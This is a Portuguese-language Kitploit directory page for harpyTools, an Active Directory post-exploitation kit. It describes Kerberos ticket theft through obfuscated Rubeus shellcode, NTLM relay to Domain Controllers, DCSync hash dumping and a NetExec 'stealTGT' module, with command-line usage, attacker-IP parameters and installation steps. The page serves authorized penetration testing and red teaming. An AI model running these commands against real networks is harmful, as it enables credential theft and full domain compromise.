Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
harpyTools — Kit de pós-exploração automatizado do Active Directory para extração de tickets Kerberos, ataques de relay NTLM e movimento lateral via integração com NetExec, Impacket e Donut. | Kitploit
Ferramentas/GitHubGitHub/jssngc/harpytools
Escalada de PrivilégiosGeração de PayloadsExploraçãoMovimento LateralShellcodePós-ExploraçãoTestes de PenetraçãoComando e ControleRed Teaming
GitHubjssngc/harpytools

harpyTools

Kit de pós-exploração automatizado do Active Directory para extração de tickets Kerberos, ataques de relay NTLM e movimento lateral via integração com NetExec, Impacket e Donut.

192há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

Utilitários de Automação de Pós-Exploração e Relay do Active Directory

Este repositório contém uma coleção de scripts orquestradores em Python projetados para avaliações de segurança e testes de penetração em ambientes Active Directory. Essas ferramentas são especificamente desenvolvidas para cenários de pós-exploração onde o acesso administrativo local já foi estabelecido em uma estação de trabalho ou servidor comprometido, e o objetivo é realizar movimentação lateral ou escalonamento de privilégios em direção ao domínio Active Directory mais amplo.

Ao automatizar fluxos de trabalho que envolvem utilitários de segurança comuns como NetExec, Impacket, Donut e BloodyAD, esses scripts simplificam processos complexos de várias etapas em operações repetíveis de comando único.

Pré-requisitos

Os scripts exigem que as seguintes ferramentas estejam instaladas no sistema host e disponíveis no PATH do sistema:

  • Python 3.x
  • NetExec (nxc)
  • Impacket (impacket-ntlmrelayx, impacket-secretsdump, impacket-ticketConverter)
  • Donut (gerador de shellcode)
  • Myph (compilador/obfuscador de binários)
  • BloodyAD (ferramenta de administração do Active Directory)
  • Utilitários Linux padrão: awk, base64

Dependências Opcionais do Python

Para formatação aprimorada de saída no console, instale os seguintes pacotes:

root@kitploit:~
pip install colorama rich

Visão Geral dos Componentes

1. Orquestrador de Extração de TGT (harpyTGT.py)

Este script automatiza a extração de um Ticket de Concessão de Ticket Kerberos (TGT) de uma sessão Windows logada e o converte em um formato ccache compatível com Linux.

  • Cenário: Uma vez obtido o acesso de administrador local em uma máquina, esta ferramenta permite que operadores coletem os tickets Kerberos dos usuários do domínio ativos naquele host, possibilitando movimentação lateral sem conhecer suas senhas em texto claro.
  • Mecanismo: Gera um payload de shellcode Rubeus.exe via Donut, aplica ofuscação usando Myph e executa o binário resultante no host alvo usando tarefas agendadas (schtask_as) ou mmcexec.

Execução Padrão (Usuário alvo possui privilégios administrativos):

root@kitploit:~
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe>

Execução Alternativa (Usuário alvo não possui privilégios administrativos):

root@kitploit:~
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe> --no-target-admin --attacker-ip <ATTACKER_IP>

2. Automação de Relay NTLM (harpyRelay.py)

Este script coordena ataques de relay NTLM visando políticas de assinatura SMB ou LDAP mal configuradas em Controladores de Domínio para alcançar escalonamento de privilégios em todo o domínio ou realizar um dump do banco de dados NTDS (DCSync).

  • Cenário: Utilizando privilégios de administrador local existentes em um host comprometido, o script força um processo de alto privilégio (como uma sessão de Administrador de Domínio) a autenticar de volta ao atacante, retransmitindo essas credenciais para o Controlador de Domínio para comprometer todo o domínio via LDAP/LDAPS.
  • Mecanismo: Inicia um ouvinte ntlmrelayx, dispara uma solicitação de autenticação do cliente comprometido via NetExec, monitora a saída em busca de exploração bem-sucedida e faz o dump dos hashes do domínio. A ferramenta contém rotinas de limpeza automatizadas para minimizar a pegada no domínio alvo.

Fluxo LDAPS (Padrão):

root@kitploit:~
./harpyRelay.py--target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL>

Fluxo LDAP (Fluxo alternativo quando LDAPS não está disponível):

root@kitploit:~
./harpyRelay.py --target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL> --no-ldaps

3. Módulo NetExec: stealTGT

Um módulo personalizado para NetExec (nxc) projetado para extrair o Ticket de Concessão de Ticket Kerberos (TGT) de um usuário específico logado na máquina alvo.

O módulo interage via mmcexec como SYSTEM, automatizando a geração de um payload evasivo (encapsulando Rubeus com Donut e Myph), executando-o na memória, capturando a saída do ticket em Base64 e convertendo-o transparentemente em um arquivo .ccache pronto para uso no Linux.

Pré-requisitos no Host Atacante (Kali Linux)

O módulo verifica automaticamente se os seguintes utilitários estão instalados e disponíveis em seu $PATH:

  • donut
  • myph
  • impacket-ticketConverter

Instalação do Módulo

Para carregar o módulo externo no NetExec, copie o script stealTGT.py para o diretório local de módulos do NetExec:

root@kitploit:~
cp stealTGT.py ~/.nxc/modules/

Uso e Sintaxe

root@kitploit:~
netexec smb <TARGET_IP> -u <ADMIN_USER> -p <ADMIN_PASS> --local-auth -M stealTGT -o USER=<TARGET_USER> RUBEUS=/path/to/Rubeus.exe

Opções do Módulo (-o):

  • USER: O nome de usuário da sessão atualmente logada da qual você deseja coletar o TGT (por exemplo, jdoe).
  • RUBEUS: O caminho local em sua máquina atacante onde o binário legítimo Rubeus.exe está localizado.

Recursos Operacionais

  • Limpeza Automatizada do Ambiente: O utilitário de relay rastreia contas efêmeras criadas durante a execução e tenta automaticamente a remoção via bloodyad ou netexec assim que as operações terminam.
  • Tratamento de Ambientes Não-TLS: Inclui fallbacks explícitos para ambientes onde os Controladores de Domínio não suportam LDAP sobre TLS (LDAPS).

Aviso Legal

AVISO CRÍTICO: Este repositório é destinado estritamente para auditoria de segurança autorizada, pesquisa de vulnerabilidades e fins educacionais. Executar essas ferramentas contra infraestrutura de produção sem autorização prévia explícita e por escrito dos proprietários do sistema é estritamente proibido. O autor não assume nenhuma responsabilidade por uso indevido, danos colaterais ou consequências legais resultantes da implantação deste software.

Baixar ferramenta